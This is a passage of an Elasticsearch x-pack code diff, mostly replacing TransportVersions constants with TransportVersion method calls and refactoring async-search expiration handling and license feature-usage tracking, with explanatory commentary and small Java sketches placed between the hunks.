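A caller then writes something like `bus.addTemporaryListener(s -> isRestored(s)).thenAccept(...)`, which is the shape the refactored test uses via `addListener(...)` on the returned future.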
diff --git a/x-pack/plugin/ccr/src/main/java/org/elasticsearch/xpack/ccr/CCRInfoTransportAction.java b/x-pack/plugin/ccr/src/main/java/org/elasticsearch/xpack/ccr/CCRInfoTransportAction.java
index 8cb98bb4458aa..6a7d6464a6826 100644
--- a/x-pack/plugin/ccr/src/main/java/org/elasticsearch/xpack/ccr/CCRInfoTransportAction.java
+++ b/x-pack/plugin/ccr/src/main/java/org/elasticsearch/xpack/ccr/CCRInfoTransportAction.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.ccr;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.action.support.ActionFilters;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
@@ -90,7 +89,7 @@ public Usage(StreamInput in) throws IOException {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     public int getNumberOfFollowerIndices() {
diff --git a/x-pack/plugin/ccr/src/test/java/org/elasticsearch/xpack/CcrIntegTestCase.java b/x-pack/plugin/ccr/src/test/java/org/elasticsearch/xpack/CcrIntegTestCase.java
index 644a2a074ac59..ee49dfcda3f78 100644
--- a/x-pack/plugin/ccr/src/test/java/org/elasticsearch/xpack/CcrIntegTestCase.java
+++ b/x-pack/plugin/ccr/src/test/java/org/elasticsearch/xpack/CcrIntegTestCase.java
@@ -182,7 +182,8 @@ public final void startClusters() throws Exception {
             0,
             "leader",
             mockPlugins,
-            Function.identity()
+            Function.identity(),
+            TEST_ENTITLEMENTS::addEntitledNodePaths
         );
         leaderCluster.beforeTest(random());
         leaderCluster.ensureAtLeastNumDataNodes(numberOfNodesPerCluster());
@@ -204,7 +205,8 @@
             0,
             "follower",
             mockPlugins,
-            Function.identity()
+            Function.identity(),
+            TEST_ENTITLEMENTS::addEntitledNodePaths
         );
         clusterGroup = new ClusterGroup(leaderCluster, followerCluster);
diff --git a/x-pack/plugin/core/build.gradle b/x-pack/plugin/core/build.gradle
index 41ff487d760da..6a17216946d1a 100644
--- a/x-pack/plugin/core/build.gradle
+++ b/x-pack/plugin/core/build.gradle
@@ -70,7 +70,7 @@ dependencies {
   testImplementation project(path: ':modules:rest-root')
   testImplementation project(path: ':modules:health-shards-availability')
   // Needed for Fips140ProviderVerificationTests
-  testCompileOnly('org.bouncycastle:bc-fips:1.0.2.5')
+  testCompileOnly('org.bouncycastle:bc-fips:1.0.2.6')
   testImplementation(project(':x-pack:license-tools')) {
     transitive = false
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicensesMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicensesMetadata.java
index 81852fbbb5b61..e719103b9b669 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicensesMetadata.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/license/LicensesMetadata.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.license;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.cluster.AbstractNamedDiffable;
 import org.elasticsearch.cluster.NamedDiff;
 import org.elasticsearch.cluster.metadata.Metadata;
@@ -108,7 +107,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java
index 3c7b089b4cd63..6b9b8266ae8b9 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/license/XPackLicenseState.java
@@ -447,7 +447,13 @@ public String statusDescription() {
     void featureUsed(LicensedFeature feature) {
         checkExpiry();
-        usage.put(new FeatureUsage(feature, null), epochMillisProvider.getAsLong());
+        final long now = epochMillisProvider.getAsLong();
+        final FeatureUsage feat = new FeatureUsage(feature, null);
+        final Long mostRecent = usage.get(feat);
+        // only update if needed, to prevent ConcurrentHashMap lock-contention on writes
+        if (mostRecent == null || now > mostRecent) {
+            usage.put(feat, now);
+        }
     }
     void enableUsageTracking(LicensedFeature feature, String contextName) {
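The featureUsed change is a contention fix rather than a behavioural one: the usage map is written on every licensed-feature check, and a ConcurrentHashMap put takes a per-bin lock while a get is lock-free, so reading first and writing only when the timestamp actually advances keeps the hot path read-only. A minimal sketch of the pattern follows; LastUsedTracker and its method names are hypothetical.

```java
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Read-before-write on a ConcurrentHashMap: on hot paths an unconditional
// put() contends on the bin lock every call, while get() is lock-free, so
// only write when the stored value would actually change.
class LastUsedTracker<K> {
    private final Map<K, Long> lastUsedMillis = new ConcurrentHashMap<>();

    void recordUse(K key, long nowMillis) {
        Long mostRecent = lastUsedMillis.get(key); // lock-free read
        if (mostRecent == null || nowMillis > mostRecent) {
            lastUsedMillis.put(key, nowMillis);    // write only on change
        }
    }

    Long lastUsed(K key) {
        return lastUsedMillis.get(key);
    }
}
```

The check-then-act pair is still racy, but the race is benign for this use: two near-simultaneous writers can at worst leave a timestamp a few milliseconds stale, which does not matter for coarse usage reporting.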
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/cluster/routing/allocation/mapper/DataTierFieldMapper.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/cluster/routing/allocation/mapper/DataTierFieldMapper.java
index 0e185a90ed39b..67df2b34c4c1f 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/cluster/routing/allocation/mapper/DataTierFieldMapper.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/cluster/routing/allocation/mapper/DataTierFieldMapper.java
@@ -60,6 +60,11 @@ protected boolean matches(String pattern, boolean caseInsensitive, QueryRewriteC
         return Regex.simpleMatch(pattern, tierPreference);
     }
+    @Override
+    public String getConstantFieldValue(SearchExecutionContext context) {
+        return context.getTierPreference();
+    }
+
     @Override
     public Query existsQuery(SearchExecutionContext context) {
         String tierPreference = context.getTierPreference();
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/aggregatemetric/AggregateMetricFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/aggregatemetric/AggregateMetricFeatureSetUsage.java
index 28f8b2013892e..e320b190740e1 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/aggregatemetric/AggregateMetricFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/aggregatemetric/AggregateMetricFeatureSetUsage.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.aggregatemetric;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.xpack.core.XPackFeatureUsage;
 import org.elasticsearch.xpack.core.XPackField;
@@ -28,7 +27,7 @@ public AggregateMetricFeatureSetUsage(boolean available, boolean enabled) {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/analytics/AnalyticsFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/analytics/AnalyticsFeatureSetUsage.java
index 84ada6b985af8..17ec143d80f78 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/analytics/AnalyticsFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/analytics/AnalyticsFeatureSetUsage.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.analytics;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.xcontent.XContentBuilder;
@@ -48,7 +47,7 @@ protected void innerXContent(XContentBuilder builder, Params params) throws IOEx
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/async/AsyncResultsService.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/async/AsyncResultsService.java
index 2236304d8c4d0..1a0254f7d8471 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/async/AsyncResultsService.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/async/AsyncResultsService.java
@@ -12,6 +12,7 @@
 import org.elasticsearch.ExceptionsHelper;
 import org.elasticsearch.ResourceNotFoundException;
 import org.elasticsearch.action.ActionListener;
+import org.elasticsearch.action.update.UpdateResponse;
 import org.elasticsearch.cluster.node.DiscoveryNode;
 import org.elasticsearch.cluster.service.ClusterService;
 import org.elasticsearch.common.TriFunction;
@@ -86,23 +87,10 @@ public void retrieveResult(GetAsyncResultRequest request, ActionListener<Response> listener) {
         if (expirationTime > 0) {
-            store.updateExpirationTime(
-                searchId.getDocId(),
+            updateExpirationTime(
+                searchId,
                 expirationTime,
-                ActionListener.wrap(p -> getSearchResponseFromTask(searchId, request, nowInMillis, expirationTime, listener), exc -> {
-                    RestStatus status = ExceptionsHelper.status(ExceptionsHelper.unwrapCause(exc));
-                    if (status != RestStatus.NOT_FOUND) {
-                        logger.error(
-                            () -> format("failed to update expiration time for async-search [%s]", searchId.getEncoded()),
-                            exc
-                        );
-                        listener.onFailure(exc);
-                    } else {
-                        // the async search document or its index is not found.
-                        // That can happen if an invalid/deleted search id is provided.
-                        listener.onFailure(new ResourceNotFoundException(searchId.getEncoded()));
-                    }
-                })
+                listener.delegateFailure((l, unused) -> getSearchResponseFromTask(searchId, request, nowInMillis, expirationTime, l))
             );
         } else {
             getSearchResponseFromTask(searchId, request, nowInMillis, expirationTime, listener);
@@ -122,7 +110,7 @@ private void getSearchResponseFromTask(
         try {
             final Task task = store.getTaskAndCheckAuthentication(taskManager, searchId, asyncTaskClass);
             if (task == null || (updateInitialResultsInStore && task.isCancelled())) {
-                getSearchResponseFromIndex(searchId, request, nowInMillis, listener);
+                getSearchResponseFromIndexAndUpdateExpiration(searchId, request, nowInMillis, expirationTimeMillis, listener);
                 return;
             }
@@ -137,30 +125,40 @@
             if (added == false) {
                 // the task must have completed, since we cannot add a completion listener
                 assert store.getTaskAndCheckAuthentication(taskManager, searchId, asyncTaskClass) == null;
-                getSearchResponseFromIndex(searchId, request, nowInMillis, listener);
+                getSearchResponseFromIndexAndUpdateExpiration(searchId, request, nowInMillis, expirationTimeMillis, listener);
             }
         } catch (Exception exc) {
             listener.onFailure(exc);
         }
     }
-    private void getSearchResponseFromIndex(
+    private void getSearchResponseFromIndexAndUpdateExpiration(
         AsyncExecutionId searchId,
         GetAsyncResultRequest request,
         long nowInMillis,
-        ActionListener listener
+        long expirationTime,
+        ActionListener outListener
     ) {
-        store.getResponse(searchId, true, listener.delegateFailure((l, response) -> {
-            try {
-                sendFinalResponse(request, response, nowInMillis, l);
-            } finally {
-                if (response instanceof StoredAsyncResponse storedAsyncResponse
-                    && storedAsyncResponse.getResponse() instanceof RefCounted refCounted) {
-                    refCounted.decRef();
+        var updateListener = outListener.delegateFailure((listener, unused) -> {
+            store.getResponse(searchId, true, listener.delegateFailure((l, response) -> {
+                try {
+                    sendFinalResponse(request, response, nowInMillis, l);
+                } finally {
+                    if (response instanceof StoredAsyncResponse storedAsyncResponse
+                        && storedAsyncResponse.getResponse() instanceof RefCounted refCounted) {
+                        refCounted.decRef();
+                    }
                 }
-            }
-        }));
+            }));
+        });
+        // If updateInitialResultsInStore=false, we can't update expiration while the task is running since the document doesn't exist yet.
+        // So let's update the expiration here when the task has been completed.
+        if (updateInitialResultsInStore == false && expirationTime != -1) {
+            updateExpirationTime(searchId, expirationTime, updateListener.map(unused -> null));
+        } else {
+            updateListener.onResponse(null);
+        }
     }
     private void sendFinalResponse(GetAsyncResultRequest request, Response response, long nowInMillis, ActionListener listener) {
@@ -172,4 +170,18 @@ private void sendFinalResponse(GetAsyncResultRequest request, Response response,
         listener.onResponse(response);
     }
+
+    private void updateExpirationTime(AsyncExecutionId searchId, long expirationTime, ActionListener<UpdateResponse> listener) {
+        store.updateExpirationTime(searchId.getDocId(), expirationTime, listener.delegateResponse((l, e) -> {
+            RestStatus status = ExceptionsHelper.status(ExceptionsHelper.unwrapCause(e));
+            if (status != RestStatus.NOT_FOUND) {
+                logger.error(() -> format("failed to update expiration time for async-search [%s]", searchId.getEncoded()), e);
+                l.onFailure(e);
+            } else {
+                // the async search document or its index is not found.
+                // That can happen if an invalid/deleted search id is provided.
+                l.onFailure(new ResourceNotFoundException(searchId.getEncoded()));
+            }
+        }));
+    }
 }
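The AsyncResultsService rewrite replaces a nested ActionListener.wrap callback with two small combinators: delegateFailure ("on success, continue with the next step") and delegateResponse ("on failure, remap the error", here turning anything other than a NOT_FOUND status pass-through into a ResourceNotFoundException for missing documents). For readers unfamiliar with the Elasticsearch ActionListener API, the interface below is a hedged, self-contained approximation of just those two combinators; the real interface has many more and differs in detail.

```java
import java.util.function.BiConsumer;

// Tiny stand-in for an async callback with two composition helpers.
interface Listener<T> {
    void onResponse(T value);
    void onFailure(Exception e);

    // On success run `next`; failures flow through unchanged
    // (same shape as ActionListener#delegateFailure used in the patch).
    default <U> Listener<U> delegateFailure(BiConsumer<Listener<T>, U> next) {
        Listener<T> outer = this;
        return new Listener<U>() {
            @Override public void onResponse(U value) { next.accept(outer, value); }
            @Override public void onFailure(Exception e) { outer.onFailure(e); }
        };
    }

    // Keep the success path; let `handler` rewrite or remap failures
    // (same shape as ActionListener#delegateResponse).
    default Listener<T> delegateResponse(BiConsumer<Listener<T>, Exception> handler) {
        Listener<T> outer = this;
        return new Listener<T>() {
            @Override public void onResponse(T value) { outer.onResponse(value); }
            @Override public void onFailure(Exception e) { handler.accept(outer, e); }
        };
    }
}
```

With combinators like these, "update the expiration time, then fetch and send the stored response" composes as a flat chain instead of the hand-written nesting the old code used, and the NOT_FOUND remapping lives in exactly one place.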
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/AutoFollowMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/AutoFollowMetadata.java
index 802d43436d379..8876328397868 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/AutoFollowMetadata.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/AutoFollowMetadata.java
@@ -8,7 +8,6 @@
 import org.elasticsearch.ElasticsearchParseException;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.cluster.AbstractNamedDiffable;
 import org.elasticsearch.cluster.metadata.DataStream;
 import org.elasticsearch.cluster.metadata.IndexAbstraction;
@@ -138,7 +137,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/action/ShardFollowTask.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/action/ShardFollowTask.java
index 4b2b840d6dfdc..af020ae6c3b90 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/action/ShardFollowTask.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/action/ShardFollowTask.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.ccr.action;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.Strings;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
@@ -198,6 +197,6 @@ public String toString() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
     }
 }
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datastreams/DataStreamFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datastreams/DataStreamFeatureSetUsage.java
index a57821670647b..33defc62c91a8 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datastreams/DataStreamFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datastreams/DataStreamFeatureSetUsage.java
@@ -43,7 +43,7 @@ public void writeTo(StreamOutput out) throws IOException {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     public DataStreamStats getStats() {
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datatiers/DataTiersFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datatiers/DataTiersFeatureSetUsage.java
index 48002e6ed41fc..3d206059c1005 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datatiers/DataTiersFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datatiers/DataTiersFeatureSetUsage.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.datatiers;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.Strings;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
@@ -45,7 +44,7 @@ public DataTiersFeatureSetUsage(Map tierStats) {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     public Map getTierStats() {
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichFeatureSetUsage.java
index b51fa386ddeea..220b6dcae9c5a 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichFeatureSetUsage.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.enrich;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.xpack.core.XPackFeatureUsage;
 import org.elasticsearch.xpack.core.XPackField;
@@ -27,6 +26,6 @@ public EnrichFeatureSetUsage(StreamInput input) throws IOException {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichMetadata.java
index 117dea14229e2..ccd09888870e9 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichMetadata.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichMetadata.java
@@ -8,7 +8,6 @@
 import org.elasticsearch.ElasticsearchParseException;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.cluster.AbstractNamedDiffable;
 import org.elasticsearch.cluster.metadata.Metadata;
 import org.elasticsearch.common.io.stream.StreamInput;
@@ -86,7 +85,7 @@ public EnumSet context() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/eql/EqlFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/eql/EqlFeatureSetUsage.java
index 96742c1e5e57f..689da75d9b1ec 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/eql/EqlFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/eql/EqlFeatureSetUsage.java
@@ -8,7 +8,6 @@
 package org.elasticsearch.xpack.core.eql;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.xcontent.XContentBuilder;
@@ -54,7 +53,7 @@ public void writeTo(StreamOutput out) throws IOException {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/frozen/FrozenIndicesFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/frozen/FrozenIndicesFeatureSetUsage.java
index 9421454abfff9..192514945c99d 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/frozen/FrozenIndicesFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/frozen/FrozenIndicesFeatureSetUsage.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.frozen;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.common.io.stream.StreamOutput;
 import org.elasticsearch.core.UpdateForV10;
@@ -30,7 +29,7 @@ public FrozenIndicesFeatureSetUsage(StreamInput input) throws IOException {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/graph/GraphFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/graph/GraphFeatureSetUsage.java
index 53994f310c949..88f5fed3ea4fa 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/graph/GraphFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/graph/GraphFeatureSetUsage.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.graph;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.xpack.core.XPackFeatureUsage;
 import org.elasticsearch.xpack.core.XPackField;
@@ -26,7 +25,7 @@ public GraphFeatureSetUsage(boolean available, boolean enabled) {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleFeatureSetUsage.java
index 543a5be812a1c..03b9f899aeac8 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleFeatureSetUsage.java
@@ -40,7 +40,7 @@ public IndexLifecycleFeatureSetUsage(StreamInput input) throws IOException {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleMetadata.java
index 5d5739e5867fd..c1faa535af397 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleMetadata.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleMetadata.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.ilm;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.cluster.Diff;
 import org.elasticsearch.cluster.DiffableUtils;
 import org.elasticsearch.cluster.NamedDiff;
@@ -124,7 +123,7 @@ public Iterator toXContentChunked(ToXContent.Params ignore
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
     }
     @Override
@@ -200,7 +199,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
     }
     static Diff readLifecyclePolicyDiffFrom(StreamInput in) throws IOException {
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/logstash/LogstashFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/logstash/LogstashFeatureSetUsage.java
index 4a5ebad732d78..a2f6c6cdce4b0 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/logstash/LogstashFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/logstash/LogstashFeatureSetUsage.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.logstash;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.common.io.stream.StreamInput;
 import org.elasticsearch.xpack.core.XPackFeatureUsage;
 import org.elasticsearch.xpack.core.XPackField;
@@ -26,7 +25,7 @@ public LogstashFeatureSetUsage(boolean available) {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
 }
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MachineLearningFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MachineLearningFeatureSetUsage.java
index 82f50ba3a889f..844a61d0221b7 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MachineLearningFeatureSetUsage.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MachineLearningFeatureSetUsage.java
@@ -75,7 +75,7 @@ public MachineLearningFeatureSetUsage(StreamInput in) throws IOException {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.ZERO;
+        return TransportVersion.zero();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MlMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MlMetadata.java
index 723b821abd17f..eccfb93ddbea4 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MlMetadata.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MlMetadata.java
@@ -67,7 +67,7 @@ public boolean isResetMode() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
    }
     @Override
@@ -181,7 +181,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
     }
     static Diff readJobDiffFrom(StreamInput in) throws IOException {
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/OpenJobAction.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/OpenJobAction.java
index cf17a828930c5..dc2305022cbf2 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/OpenJobAction.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/OpenJobAction.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.ml.action;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.action.ActionRequestValidationException;
 import org.elasticsearch.action.ActionType;
 import org.elasticsearch.action.support.master.MasterNodeRequest;
@@ -229,7 +228,7 @@ public String toString() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
-        return TransportVersions.MINIMUM_COMPATIBLE;
+        return TransportVersion.minimumCompatible();
     }
     @Override
diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDataFrameAnalyticsAction.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDataFrameAnalyticsAction.java
index c21a4bfe03156..cf23bc27010e8 100644
--- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDataFrameAnalyticsAction.java
+++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDataFrameAnalyticsAction.java
@@ -7,7 +7,6 @@
 package org.elasticsearch.xpack.core.ml.action;
 import org.elasticsearch.TransportVersion;
-import org.elasticsearch.TransportVersions;
 import org.elasticsearch.action.ActionRequestValidationException;
 import org.elasticsearch.action.ActionType;
 import org.elasticsearch.action.support.master.MasterNodeRequest;
@@ -206,7 +205,7 @@ public String getWriteableName() {
     @Override
     public TransportVersion getMinimalSupportedVersion() {
